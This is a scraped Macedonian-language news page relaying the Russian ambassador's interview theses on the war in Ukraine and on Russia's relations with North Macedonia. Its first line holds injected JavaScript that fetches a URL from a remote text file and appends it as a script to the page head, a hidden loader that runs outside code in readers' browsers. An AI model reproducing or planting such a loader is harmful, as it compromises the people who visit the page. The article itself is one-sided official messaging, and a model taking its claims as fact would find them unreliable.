;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Баздникин: Русија отсекогаш била отворена за сеопфатна соработка со Македонија - Антропол
АктуелноИнтернационално

Баздникин: Русија отсекогаш била отворена за сеопфатна соработка со Македонија

  • Амбасадорот на Русиjа Сергеј Баздникин во интервју за весникот „Нова Македонија“ зборуваше за целите и задачите на специјалната воена операција (СВО), изгледите и условите за неjзиното завршување, а исто така ги оцени билатералните односи меѓу Русија и Северна Македонија. Ви прилог ви ги пренесуваме главните тези, објавени на фејсбук страницата на руската абасада:

Не сме во војна со народот на Украина, кој самиот стана заложник на режимот во Киев и на неговите западни господари. А токму тие се целосно одговорни за поттикнување на борбени дејства и за нивна ескалација.

За мир во Украина потребна е политичка волја на Западот и Киев – во Москва тоа сè уште не го гледаме. САД и НАТО отворено изјавуваат дека целта им е да ѝ нанесат стратешки пораз на Русија.

СВО ќе заврши со исполнување од страна на Вооружените сили на Руската Федерација на сите задачи што се поставени пред нив.

Русија отсекогаш била отворена за сеопфатна соработка со вашата земја – во тие области и до тој степен до кој им одговара на интересите на секоја од страните.

Од февруари 2022 година властите на Северна Македонија ја одбија конструктивната интеракција и презедоа неколку непријателски чекори кои сериозно ги наштетија односите.

Руската страна се придржува до недвосмислен став – ние не се мешаме во внатрешните работи на вашата држава и немаме намера да го правиме тоа, не преземаме никакви чекори во форма на наводни хибридни закани, за кои неосновано сме обвинети.

За нормална интеракција неопходни се рамноправност, взаемно почитување и земање во предвид меѓусебни интереси – само таква основа, очигледно, е единствената можна во поправедниот мултиполарен свет што се формира во нашата ера.